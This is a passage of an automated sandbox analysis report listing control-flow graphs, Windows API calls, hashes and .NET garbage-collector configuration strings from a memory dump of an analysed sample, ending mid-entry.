                      control_flow_graph 184 7ff67dcccfb0-7ff67dcccfdd 185 7ff67dcccfdf 184->185 186 7ff67dcccfe6-7ff67dcccfee 185->186 187 7ff67dcccff0-7ff67dcccffa call 7ff67dcf0900 186->187 188 7ff67dcccffc-7ff67dccd01c 186->188 187->185 190 7ff67dccd022-7ff67dccd028 188->190 191 7ff67dccd113-7ff67dccd119 188->191 195 7ff67dccd02e 190->195 196 7ff67dccd0fd-7ff67dccd108 190->196 192 7ff67dccd11b-7ff67dccd121 call 7ff67dcd36f0 191->192 193 7ff67dccd126-7ff67dccd129 191->193 192->193 199 7ff67dccd12f-7ff67dccd136 193->199 200 7ff67dccd1ea-7ff67dccd1f4 call 7ff67dce4c10 193->200 197 7ff67dccd030-7ff67dccd036 195->197 196->190 201 7ff67dccd10e 196->201 202 7ff67dccd0a2-7ff67dccd0b2 call 7ff67dcb97d0 197->202 203 7ff67dccd038-7ff67dccd040 197->203 204 7ff67dccd1e1-7ff67dccd1e8 199->204 205 7ff67dccd13c-7ff67dccd144 199->205 213 7ff67dccd25c-7ff67dccd25f 200->213 214 7ff67dccd1f6-7ff67dccd1fc 200->214 201->191 219 7ff67dccd0b4-7ff67dccd0bb 202->219 220 7ff67dccd0d6-7ff67dccd0de 202->220 203->202 207 7ff67dccd042-7ff67dccd049 203->207 204->200 209 7ff67dccd192-7ff67dccd1a6 call 7ff67dccdc60 204->209 205->204 208 7ff67dccd14a-7ff67dccd174 205->208 215 7ff67dccd04b-7ff67dccd058 207->215 216 7ff67dccd099-7ff67dccd0a0 SwitchToThread 207->216 208->204 217 7ff67dccd176-7ff67dccd18d call 7ff67dcee330 208->217 226 7ff67dccd1ab-7ff67dccd1b5 209->226 213->209 228 7ff67dccd265-7ff67dccd27d call 7ff67dccd6e0 213->228 221 7ff67dccd1fe-7ff67dccd201 214->221 222 7ff67dccd20d-7ff67dccd21d call 7ff67dcf0740 214->222 223 7ff67dccd05a 215->223 224 7ff67dccd078-7ff67dccd07c 215->224 227 7ff67dccd0f3-7ff67dccd0f7 216->227 217->209 230 7ff67dccd0cc-7ff67dccd0d1 call 7ff67dcc2960 219->230 231 7ff67dccd0bd-7ff67dccd0c3 219->231 235 7ff67dccd0e0-7ff67dccd0e5 call 7ff67dcf0900 220->235 236 7ff67dccd0ea-7ff67dccd0ec 220->236 221->222 232 7ff67dccd203-7ff67dccd208 call 7ff67dcd36f0 221->232 248 7ff67dccd21f-7ff67dccd229 call 7ff67dce4c10 222->248 249 7ff67dccd22b-7ff67dccd231 222->249 234 7ff67dccd060-7ff67dccd064 223->234 224->227 237 7ff67dccd07e-7ff67dccd086 224->237 226->186 238 7ff67dccd1bb-7ff67dccd1e0 226->238 227->196 227->197 228->226 230->220 231->230 240 7ff67dccd0c5-7ff67dccd0ca SwitchToThread 231->240 232->222 234->224 244 7ff67dccd066-7ff67dccd06e 234->244 235->236 236->227 246 7ff67dccd0ee call 7ff67dcb9750 236->246 237->227 247 7ff67dccd088-7ff67dccd097 call 7ff67dcb97d0 SwitchToThread 237->247 240->220 244->224 250 7ff67dccd070-7ff67dccd076 244->250 246->227 247->236 248->213 248->249 254 7ff67dccd233-7ff67dccd236 249->254 255 7ff67dccd23c-7ff67dccd257 call 7ff67dcee330 249->255 250->224 250->234 254->209 254->255 255->213
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: SwitchThread
                      • String ID:
                      • API String ID: 115865932-0
                      • Opcode ID: 24ff2dfc20294bcd9dd16e83c93cb601c9c092b067f0375acd745dcc2c3e2eaa
                      • Instruction ID: e7c94489b199e30150846249e6cdaccbf65e5ddaaa8a846940bf830e7f20eabe
                      • Opcode Fuzzy Hash: 24ff2dfc20294bcd9dd16e83c93cb601c9c092b067f0375acd745dcc2c3e2eaa
                      • Instruction Fuzzy Hash: B471A033E2C28386F6549F29A94163926A9BF40754F084B39EA5DD72D9FF3CF8438601

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF67DCC53C8,?,?,0000000A,00007FF67DCC4420,?,?,00000000,00007FF67DCBEB11), ref: 00007FF67DCC29D7
                      • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF67DCC53C8,?,?,0000000A,00007FF67DCC4420,?,?,00000000,00007FF67DCBEB11), ref: 00007FF67DCC29F7
                      • VirtualAllocExNuma.KERNEL32 ref: 00007FF67DCC2A18
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AllocVirtual$CurrentNumaProcess
                      • String ID:
                      • API String ID: 647533253-0
                      • Opcode ID: ef0767e406028f4ab4eb664375ae7d293fd3944ac4027851bbb6826bde6e8114
                      • Instruction ID: 61a2f4a8a082504be17fdf4694f1942f0588071e2c1a64933b8d8f4e2827060d
                      • Opcode Fuzzy Hash: ef0767e406028f4ab4eb664375ae7d293fd3944ac4027851bbb6826bde6e8114
                      • Instruction Fuzzy Hash: E3F0A472B1869182E7218B06F400619A760AB49BD4F480634EF8C57B58DF3DC6928B00

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: EventRegister
                      • String ID: gcConservative
                      • API String ID: 3840811365-1953527212
                      • Opcode ID: 368ea8b34af60ac17b34259db04c81eed38ab11d7739e59b3831215b0b82d1b0
                      • Instruction ID: 948d47d0ea292883a0a44f6bcb25d182378a6a5cd04d0fed4d4775c023e30b4e
                      • Opcode Fuzzy Hash: 368ea8b34af60ac17b34259db04c81eed38ab11d7739e59b3831215b0b82d1b0
                      • Instruction Fuzzy Hash: 1D31F723A386C7D6EB01DB56E9805A83364EF45748F444A36DA4D876A5EF7DF046C700

                      Control-flow Graph

                      APIs
                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF67DD19059,?,?,?,?,00007FF67DCBDC41,?,?,?,00007FF67DCBE1BC,00000000,00000020,?), ref: 00007FF67DD18F66
                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67DD18F7C
                        • Part of subcall function 00007FF67DD19AAC: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF67DD19AB5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                      • String ID:
                      • API String ID: 205171174-0
                      • Opcode ID: f6556d4f51cde9d22dda4e66d06e902f05e19e968265b4e597cac14e0ffc368f
                      • Instruction ID: d6bc491dcee5e82ea8a4dae872870c75e5f1232b53c372e32a518dacc36dcd08
                      • Opcode Fuzzy Hash: f6556d4f51cde9d22dda4e66d06e902f05e19e968265b4e597cac14e0ffc368f
                      • Instruction Fuzzy Hash: FFE0EC02E7D10726FD28A56215150B401528F09774E1E1F30ED3DC92D2BD1EB89D4311

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CloseCreateHandleThread
                      • String ID:
                      • API String ID: 3032276028-0
                      • Opcode ID: 0606a988fafc191b16ad9ad3a3988415e47add61d3bd0454d914aefe8f699e32
                      • Instruction ID: 96a3606c96cea060abec6d251f29775539e90b4421e8bbca85d5ea25637fa376
                      • Opcode Fuzzy Hash: 0606a988fafc191b16ad9ad3a3988415e47add61d3bd0454d914aefe8f699e32
                      • Instruction Fuzzy Hash: 08D012A6E1564182DB25EB616C111651BD17B987C4FD44638DD4EC3320FE3CD3168904
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 4d347c583ab5b81ecdc4f6afad0fb1ae00dc0cd9d2a9cab1d9c0510b902e5dc8
                      • Instruction ID: f2cc1c05f0218a15c5cbe0e855dbf124cad82b8eb21245e8a5bfcf4c485118a2
                      • Opcode Fuzzy Hash: 4d347c583ab5b81ecdc4f6afad0fb1ae00dc0cd9d2a9cab1d9c0510b902e5dc8
                      • Instruction Fuzzy Hash: D331B033B15B5186EA14CB16A50012A67F8FB49BD4F048A35EF4C97BD5EF39E4638340
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 7bc02cbd53fab7e2ccf2e21147a4af897a009dbcf47cf5d32d6ac4e9de3e81f3
                      • Instruction ID: 1e73db707ea55867585179deb77caba19c047975c7e173aff6cd7858458fc668
                      • Opcode Fuzzy Hash: 7bc02cbd53fab7e2ccf2e21147a4af897a009dbcf47cf5d32d6ac4e9de3e81f3
                      • Instruction Fuzzy Hash: E6E0CD25F2610182FB18A7126C4191416516F4D750FC48534C40D83350ED2D52EB8B50
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: BreakDebug
                      • String ID:
                      • API String ID: 456121617-0
                      • Opcode ID: 3c8c719a2a8db492cc390e112f25d5732aaf8fb4ded53f41817d31610e6627c2
                      • Instruction ID: 07490a8d31e7e40482000bc31e07beb363bad50a94c20cc8e7591b71481c7fbf
                      • Opcode Fuzzy Hash: 3c8c719a2a8db492cc390e112f25d5732aaf8fb4ded53f41817d31610e6627c2
                      • Instruction Fuzzy Hash: 8441B763F2868242FA108B2594425B923A5EB84BE4F454B32DB9DD37C9EF3CE5438740
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFailFastQueryRaiseVirtual
                      • String ID:
                      • API String ID: 3307674043-0
                      • Opcode ID: 2989ca71329d643b99a6d4e1e241b7370baf4db862422a3503335ab56397ce0d
                      • Instruction ID: 09e9ee164809b52eadc5a5d9546a2292ce89250af520ed861e4ba66751858baf
                      • Opcode Fuzzy Hash: 2989ca71329d643b99a6d4e1e241b7370baf4db862422a3503335ab56397ce0d
                      • Instruction Fuzzy Hash: 38116A72A18B8292DB24DB25A4411AAB360F7457B0F144739E7BE877C6EF39D0468701
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                      • API String ID: 0-658696054
                      • Opcode ID: d53b43dfd84efb105ad5ae99199b30ba4597350805d64627f0ed3042d0857104
                      • Instruction ID: 16b74cd1cde01a97cb4a78b3a6eb679ec3157ce848760cf2daf2e1fe1acf2927
                      • Opcode Fuzzy Hash: d53b43dfd84efb105ad5ae99199b30ba4597350805d64627f0ed3042d0857104
                      • Instruction Fuzzy Hash: 98327132628A9B81EB619B65F810AAD73A4FF557C8F415632D98C47F64EF3DD202CB04
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                      • API String ID: 0-2080704861
                      • Opcode ID: 4800937efbc33c061aba5a48662b238fc7ecf762881e21f62eb9c76b00006de6
                      • Instruction ID: e81d5dc53b0664406d94a73d059306c4b17a514af4ab7a26f6c940ca782f523f
                      • Opcode Fuzzy Hash: 4800937efbc33c061aba5a48662b238fc7ecf762881e21f62eb9c76b00006de6
                      • Instruction Fuzzy Hash: DDF18466E3898BA0F742DB66E8510F82365AF95344F854E73D00DD70B6BE3CE24AC761
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                      • String ID: SeLockMemoryPrivilege
                      • API String ID: 1752251271-475654710
                      • Opcode ID: 6efe4589b0769a308082a9ad12be656a71ec973b7c0ed8a2fddab75d5050e98b
                      • Instruction ID: c3c109c60c14367ca66af9f0e760f8c4322058fbc32afbbe5f1dd075469a8d3b
                      • Opcode Fuzzy Hash: 6efe4589b0769a308082a9ad12be656a71ec973b7c0ed8a2fddab75d5050e98b
                      • Instruction Fuzzy Hash: E731A637A2C68286FB219F61B81437A77A5EB847D4F004A35DA8E87794EE3DD1558B00
                      APIs
                      • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB81BB
                      • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB831A
                      • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB8410
                      • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB8426
                      • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF67DCB8AF0,?,?,?,?,?,?,?,?,?), ref: 00007FF67DCB8486
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
